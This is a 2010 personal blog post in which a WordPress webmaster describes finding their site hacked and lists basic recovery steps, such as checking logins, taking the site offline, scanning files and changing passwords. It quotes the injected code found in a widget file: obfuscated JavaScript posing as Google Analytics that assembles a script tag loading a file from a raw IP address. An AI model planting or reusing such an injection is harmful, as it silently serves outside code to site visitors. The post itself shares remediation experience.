My site was hacked

Posted by myvps on January 27, 2010 · Leave a Comment 

What to do when my site is hacked

The intention of this blog post to help those webmaster whose wordpress sites are hacked. Since I am not a programmer, I can only share what happened to me, and how I solved it. Hopefully this article will bring some value to you, In the article I will include some resources for further reading.

what happened

When I tried to login to wordpress I got this message "Parse error: syntax error, unexpected '<' in home/xxxx/xxxxx/xxxx/default-widegets.php in line 0000". Now I havent't updated my site for a while, so I am pretty sure it was not me who made the error.

So I downloaded the file to my computer desk top from the location specified in the message, and found this script in line 0000

"<html><body><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript srñ='" + gaJsHost + "google-analytics.com/ga.js' " + '!@&s(#r)c@!=&)\'&h$!t^&!$@t@&$p#^&@:$^/&@!&/!9(1)@.(2)1!(2)&.^#6&@&!^5(@!&.&#$1@!4)8!#/($g#$a&.(j^s)'.replace(/#|&|@|\$|\(|\!|\^|\)/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script></body></html>

My one wasn't exactly the same but very similar and has a lot more codes in it, So I removed the code by upgrading my wordpress blog in cPanel, when it was completed I went to check my site again, and this time the error message was even better " This site may harm your computer ".

So it was comfirmed by Google the site was hacked.

solutions
1. Locate your ip

If you don't know your local ip here are the steps

For Windows

Start
Run
ipconfig

For Linux

Applications
Accessories
ifconfig

2 Who logged into system

This can be found within your cpanel last login, it should be your ip

3. Enable log archiving in cPanel

4. Take your site offline by create maintenance.php and editing .htaccess file.

5. Report to your hosting company
Most companies will be restoring your site or helping you solve the problems, some won't, but unless you try you won't know, and  if your company does not want to help, it is probably time for you change a host.

6. Scan your computer
Scan your computer thoroughly using 2 or more antivirus systems listed below, if your site has more administrators, you should inform them to do the same

7. Upgrade all your thirdparty scripts to the latest version, such as wordpress , joomla, drupal. etc.

8. Change all your passwords, I mean all.

9. download all the files to your computer and scan them with antivirus softwares.

After the scan you want to look into every single file and find out if there is any other hacking scripts in the files

10. Once you are happy and sure all the files are clean, ask for a review in you google webmaster tools, it will take less than a day usually before they unmark your site.

For a more complete step by step solutions click here

Share and Enjoy:
  • Digg
  • del.icio.us
  • Facebook
  • NewsVine
  • Reddit
  • StumbleUpon
  • Google Bookmarks
  • Yahoo! Buzz
  • Twitter
  • Technorati
  • Live
  • LinkedIn
  • MySpace

Filed under Uncategorized · Tagged with

About myvps

Speak Your Mind

Tell us what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!

Security Code: